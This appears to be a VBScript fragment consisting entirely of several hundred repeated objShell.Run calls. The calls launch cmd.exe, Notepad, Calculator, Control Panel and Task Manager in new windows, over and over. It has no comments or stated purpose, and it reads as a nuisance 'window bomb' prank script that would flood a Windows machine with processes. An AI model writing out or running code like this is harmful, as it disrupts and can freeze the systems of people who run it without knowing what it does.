objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
